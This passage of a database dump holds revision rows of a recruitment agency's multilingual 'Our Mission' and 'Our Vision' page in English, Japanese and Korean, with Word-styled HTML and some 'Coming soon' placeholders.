('page', 0, 25, 101, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 140, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 140, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 140, 'ko', 0, '<p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040756\"><em><span class=\"MsoHyperlink\" style=\"font-size:28.0pt;line-height:107%;\"><strong>Our Mission&nbsp;</strong></span></em></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><o:p><span style=\"text-decoration:none;\"> </span></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040775\"><span class=\"MsoHyperlink\" style=\"font-size:16.0pt;line-height:107%;text-decoration:none;text-underline:none;\"><strong>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutal respect.</strong></span></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040788\"><em><span class=\"MsoHyperlink\" style=\"font-size:28.0pt;line-height:107%;\"><strong>Our Vision&nbsp;</strong></span></em></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><o:p><span style=\"text-decoration:none;\"> </span></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040798\"><span class=\"MsoHyperlink\" style=\"font-size:16.0pt;line-height:107%;text-decoration:none;text-underline:none;\"><strong>To be the leading partner that clients and candidates always choose to connect with.</strong></span></a><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 146, 'en', 0, '<h3><strong>Our Mission&nbsp;</strong></h3><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect.&nbsp;</p><h2>&nbsp;</h2><h3><strong>Our Vision&nbsp;</strong></h3><p>To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 146, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 25, 146, 'ko', 0, '<p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040756\"><em><span class=\"MsoHyperlink\" style=\"font-size:28.0pt;line-height:107%;\"><strong>Our Mission&nbsp;</strong></span></em></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><o:p><span style=\"text-decoration:none;\"> </span></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040775\"><span class=\"MsoHyperlink\" style=\"font-size:16.0pt;line-height:107%;text-decoration:none;text-underline:none;\"><strong>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutal respect.</strong></span></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040788\"><em><span class=\"MsoHyperlink\" style=\"font-size:28.0pt;line-height:107%;\"><strong>Our Vision&nbsp;</strong></span></em></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><o:p><span style=\"text-decoration:none;\"> </span></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040798\"><span class=\"MsoHyperlink\" style=\"font-size:16.0pt;line-height:107%;text-decoration:none;text-underline:none;\"><strong>To be the leading partner that clients and candidates always choose to connect with.</strong></span></a><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 162, 'en', 0, '<h3><strong>Our Mission&nbsp;</strong></h3><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect.&nbsp;</p><h2>&nbsp;</h2><h3><strong>Our Vision&nbsp;</strong></h3><p>To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 162, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 162, 'ko', 0, '<p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040756\"><em><span class=\"MsoHyperlink\" style=\"font-size:28.0pt;line-height:107%;\"><strong>Our Mission&nbsp;</strong></span></em></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><o:p><span style=\"text-decoration:none;\"> </span></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040775\"><span class=\"MsoHyperlink\" style=\"font-size:16.0pt;line-height:107%;text-decoration:none;text-underline:none;\"><strong>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutal respect.</strong></span></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040788\"><em><span class=\"MsoHyperlink\" style=\"font-size:28.0pt;line-height:107%;\"><strong>Our Vision&nbsp;</strong></span></em></a><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><o:p><span style=\"text-decoration:none;\"> </span></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><a name=\"_Hlk139040798\"><span class=\"MsoHyperlink\" style=\"font-size:16.0pt;line-height:107%;text-decoration:none;text-underline:none;\"><strong>To be the leading partner that clients and candidates always choose to connect with.</strong></span></a><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 167, 'en', 0, '<h3><strong>Our Mission&nbsp;</strong></h3><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect.&nbsp;</p><h2>&nbsp;</h2><h3><strong>Our Vision&nbsp;</strong></h3><p>To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 167, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 25, 167, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>위해</strong></span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 173, 'en', 0, '<blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><h3>&nbsp;</h3><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 173, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 173, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>위해</strong></span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 176, 'en', 0, '<blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><h3>&nbsp;</h3><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
